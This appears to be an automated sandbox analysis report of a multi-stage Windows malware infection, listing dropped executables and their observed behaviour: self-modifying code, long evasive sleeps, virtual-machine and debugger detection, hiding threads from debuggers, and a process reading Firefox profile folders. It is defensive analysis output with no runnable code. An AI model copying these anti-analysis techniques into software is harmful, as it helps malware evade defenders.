Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Special instruction interceptor: First address: B7BE16 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Special instruction interceptor: First address: 86DD62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Special instruction interceptor: First address: A1091E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Special instruction interceptor: First address: A16703 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Special instruction interceptor: First address: AA9617 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 61ADD62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 635091E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 6356703 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 63E9617 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 5DDDD62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 5F8091E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 5F86703 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 6019617 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Memory allocated: 5070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Memory allocated: 52B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Memory allocated: 5100000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A70B50 rdtsc 0_2_04A70B50
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 974 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 943 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1050 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1041 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1044 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window / User API: threadDelayed 877 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window / User API: threadDelayed 794 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window / User API: threadDelayed 903 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window / User API: threadDelayed 885 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window / User API: threadDelayed 773 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window / User API: threadDelayed 943 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1193
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1217
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1224
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1214
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1219
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1183
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1206
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 1216
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 870
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 881
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 909
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 875
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 808
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 886
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 849
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window / User API: threadDelayed 887
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756 Thread sleep count: 974 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756 Thread sleep time: -1948974s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7732 Thread sleep count: 943 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7732 Thread sleep time: -1886943s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728 Thread sleep count: 1050 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728 Thread sleep time: -2101050s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7832 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7716 Thread sleep count: 215 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7716 Thread sleep time: -6450000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 Thread sleep count: 1041 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 Thread sleep time: -2083041s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 1044 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -2089044s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7836 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7952 Thread sleep count: 877 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7952 Thread sleep time: -1754877s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7956 Thread sleep count: 794 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7956 Thread sleep time: -1588794s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 8040 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7936 Thread sleep count: 903 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7936 Thread sleep time: -1806903s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7940 Thread sleep count: 885 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7940 Thread sleep time: -1770885s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7948 Thread sleep count: 773 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7948 Thread sleep time: -1546773s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7964 Thread sleep count: 943 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe TID: 7964 Thread sleep time: -1886943s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7480 Thread sleep time: -2387193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7472 Thread sleep time: -2435217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 1420 Thread sleep time: -48000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7448 Thread sleep time: -2449224s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 6360 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7512 Thread sleep time: -2429214s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7468 Thread sleep time: -2439219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7452 Thread sleep time: -2367183s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7476 Thread sleep time: -2413206s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7484 Thread sleep time: -2433216s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com TID: 7676 Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com TID: 7676 Thread sleep time: -3360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 2176 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 1464 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 2112 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 1820 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 1988 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 1784 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 2024 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 3176 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 4144 Thread sleep time: -1740870s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 4280 Thread sleep time: -1762881s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7600 Thread sleep time: -1818909s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 3900 Thread sleep time: -1750875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 3140 Thread sleep time: -1616808s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 7340 Thread sleep time: -44000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 3904 Thread sleep time: -1772886s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 5968 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 5292 Thread sleep time: -1698849s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 4584 Thread sleep time: -1774887s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe TID: 6656 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe TID: 5800 Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe TID: 5800 Thread sleep count: 84 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 7444 Thread sleep count: 78 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 7444 Thread sleep time: -156078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 8148 Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 8148 Thread sleep time: -152076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 1992 Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 1992 Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 7596 Thread sleep count: 222 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 7596 Thread sleep time: -1332000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 8032 Thread sleep count: 84 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 8032 Thread sleep time: -168084s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 8124 Thread sleep count: 81 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 8124 Thread sleep time: -162081s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 4900 Thread sleep count: 75 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 4900 Thread sleep time: -150075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 2700 Thread sleep count: 89 > 30
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe TID: 2700 Thread sleep time: -178089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe TID: 6432 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe TID: 5248 Thread sleep count: 124 > 30
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe TID: 5248 Thread sleep count: 114 > 30
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406301 FindFirstFileW,FindClose, 9_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 9_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_00406301 FindFirstFileW,FindClose, 22_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 22_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: 3907f97605.exe, 3907f97605.exe, 00000028.00000001.2967637879.0000000000263000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1718567450.0000000000C10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 779ae05f2f.exe, 3907f97605.exe, 3907f97605.exe, 0000001F.00000003.3329141425.0000000001475000.00000004.00000020.00020000.00000000.sdmp, 3907f97605.exe, 0000001F.00000003.3237931398.0000000001475000.00000004.00000020.00020000.00000000.sdmp, 3907f97605.exe, 0000001F.00000003.3134050190.0000000001475000.00000004.00000020.00020000.00000000.sdmp, 3907f97605.exe, 0000001F.00000003.3101184514.0000000001475000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1716146070.0000000000293000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1758348878.0000000000883000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1759762042.0000000000883000.00000040.00000001.01000000.00000007.sdmp, 3907f97605.exe, 0000001F.00000001.2768123674.0000000000263000.00000040.00000001.01000000.00000010.sdmp, 3907f97605.exe, 00000028.00000001.2967637879.0000000000263000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 779ae05f2f.exe, 00000007.00000003.2691745817.000000000167E000.00000004.00000020.00020000.00000000.sdmp, Finish.com, 00000022.00000003.3272157864.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000024.00000002.3093176478.000001BB87678000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A70B50 rdtsc 0_2_04A70B50
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 9_2_00406328
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
